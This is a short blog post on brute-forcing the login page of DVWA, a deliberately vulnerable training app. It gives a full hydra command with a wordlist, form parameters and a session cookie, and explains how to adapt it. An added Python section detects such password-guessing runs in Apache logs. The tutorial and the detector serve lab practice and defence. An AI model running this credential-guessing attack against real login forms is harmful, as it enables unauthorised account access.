Monday, September 14, 2015

DVWA brute force login with hydra

hydra <IP-Address> -l admin -P /root/scripts/recon_enum/wordlists/passlist http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=5b1c46ae203ccb0dcbf8fc3390e276d2"
Replace <IP-Address> with the target's IP address.

The username is set with "-l admin". Replace the username as necessary, and if you're using a user list, change the parameter to "-L /path/to/userlist.txt".

Change the PHPSESSID to one you capture with Wireshark, Burp, ZAP, etc. when you manually enter a login/password.

Notice that while the request URL is typically "/dvwa/vulnerabilities/brute/?username=user&password=pass&Login=Login", in hydra you need to specify "index.php" between "/brute/" and the "?", and you replace the "?" with ":".
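
Because the form submits over GET, every guess lands in the web server's access log with the username and password in the query string. The following is an added example (not part of the original post) of how that run looks from the defender's side: it scans Apache combined-format lines for one source sending many distinct password values to the brute-force page within a short window. The log lines, IP addresses, threshold and window are constructed for illustration, and the "Hydra" User-Agent check is an assumption about the tool's stock header.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

BRUTE_PATH = "/dvwa/vulnerabilities/brute/"  # path taken from the post
LINE_RE = re.compile(
    r'(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

def make_line(ip, second, password, agent):
    # Constructed Apache combined-format line; not real traffic.
    return (f'{ip} - - [14/Sep/2015:10:00:{second:02d} +0000] "GET {BRUTE_PATH}'
            f'index.php?username=admin&password={password}&Login=Login HTTP/1.0" '
            f'200 4521 "-" "{agent}"')

# Constructed sample: eight rapid guesses from one source, one manual login.
SAMPLE = [make_line("192.0.2.10", s, f"guess{s}", "Mozilla/5.0 (Hydra)")
          for s in range(8)]
SAMPLE.append(make_line("198.51.100.7", 30, "password", "Mozilla/5.0 Firefox/40.0"))

def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: stats} for sources with >= threshold distinct password
    guesses against the brute-force page inside one sliding window."""
    attempts = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, stamp, target, agent = m.groups()
        url = urlsplit(target)
        query = parse_qs(url.query)
        if not url.path.startswith(BRUTE_PATH) or "password" not in query:
            continue
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        attempts[ip].append((when, query["password"][0], agent))
    flagged = {}
    for ip, events in attempts.items():
        events.sort(key=lambda e: e[0])
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # slide the window's left edge forward
            if len({pw for _, pw, _ in events[start:end + 1]}) >= threshold:
                flagged[ip] = {
                    "distinct_passwords": len({pw for _, pw, _ in events}),
                    # Assumption: stock tool UA contains "Hydra"; a hint only.
                    "hydra_agent": any("Hydra" in a for _, _, a in events),
                }
                break
    return flagged
```

Calling detect(SAMPLE) flags only the source that cycled through passwords; the single manual login stays below the threshold.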